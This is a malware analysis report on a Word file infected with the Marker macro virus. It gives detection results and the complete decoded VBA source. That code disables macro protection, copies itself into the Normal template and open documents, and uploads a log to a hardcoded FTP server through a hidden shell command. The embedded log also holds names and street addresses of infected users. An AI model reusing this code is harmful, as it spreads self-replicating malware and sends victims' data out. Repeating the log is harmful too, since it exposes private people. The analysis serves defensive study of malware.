Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9cb30808a848c134…

MALICIOUS

Office (OLE)

47.0 KB Created: 2006-03-09 00:25:00 Authoring application: Microsoft Word 11.1 First seen: 2014-10-17
MD5: 7949c0d622e882a149b6117a45bcb0c9 SHA-1: 4e933a16e6031751947b88992bfbadb9c62eeaa1 SHA-256: 9cb30808a848c1347117cd77aea45ea35a6bb4fef356462cc8ab8398f51891a5
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.004 Disable or Modify Toolbars and Menus

The VBA macro explicitly disables macro virus protection and attempts to replicate its code into the Normal.dot template, indicating a self-propagation and persistence mechanism. The script also writes to a file named 'c:\hsf????.sys' and attempts to transfer it via FTP to '209.201.88.110' using a hardcoded script in 'c:\netldx.vxd', suggesting it acts as a downloader or dropper for a second-stage payload.

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    'Switch the VirusProtection OFF
    Options.VirusProtection = False

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5564 bytes
SHA-256: 7672548a3226e30cf8cd300368217e7447caec5bd66b035ef62b0758234bea3e
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub

' Logfile -->

' 09:08:36  - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'



' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'



' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'



' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'



' 09:27:31 AM - Tuesday, 29 Dec 1998
' BCBSA
'



' 12:03:25 PM - Tuesday, 12 Jan 1999
' DLShaffer
'



' 01:23:51 PM - Thursday, 18 Feb 1999
' Marcia Chavez
'



' 01:53:01 PM - Thursday, 4 Mar 1999
' AWI User
'



' 06:50:02 PM - Monday, 29 Mar 1999
' Gwyneth Borden
'



' 07:27:25 PM - Friday, 2 Apr 1999
' Heather MacLeod
'



' 10:15:50 AM - Tuesday, 1 Feb 2000
' NOLS
'



' 10:23:43 AM - Friday, 11 Feb 2000
' NOLS
'



' 04:13:45 PM - Friday, 18 Feb 2000
' NOLS
'



' 08:57:53 AM - Thursday, 27 Apr 2000
' NOLS
'



' 01:00:28 PM - Friday, 5 May 2000
' NOLS
'



' 09:04:38 AM - Wednesday, 10 May 2000
' NOLS
'



' 11:32:28 AM - Tuesday, 23 Jan 2001
' NOLS
'



' 11:58:51 AM - Thursday, 15 Feb 2001
' NOLS
'



' 10:19:30 AM - Monday, 5 Mar 2001
' NOLS
'



' 11:23:00 AM - Thursday, 19 Apr 2001
' NOLS
'



' 09:08:59 AM - Wednesday, 25 Jul 2001
' NOLS
'



' 11:59:29 AM - Tuesday, 4 Sep 2001
' NOLS
'

' 09:06:28 AM - Monday, 2 Jun 2003
' NOLS
'


' 12:41:48 PM - Thursday, 22 Apr 2004
' These Nutz
' InYaMouth.inc
'



' 01:17:47 PM - Tuesday, 13 Jul 2004
' clint mccarthy
' eagle rock school
'



' 04:36:37 PM - Tuesday, 10 Aug 2004
' Stanley Richards
' 725A Bolton St
' Durham, NC 27705
' USA



' 11:54:04 AM - Monday, 30 Aug 2004
' Danielle Johnson
' City Arts & Tech High School
' 301 De Montfort Avenue
' San Francisco, CA 94122
' USA


' 10:04:50 AM - Wednesday, 2 Nov 2005
' Teachers
' City Arts &amp; Tech High School
'



' 05:11:29 PM - Monday, 5 Dec 2005
' Teachers
' City Arts &amp; Tech High School
'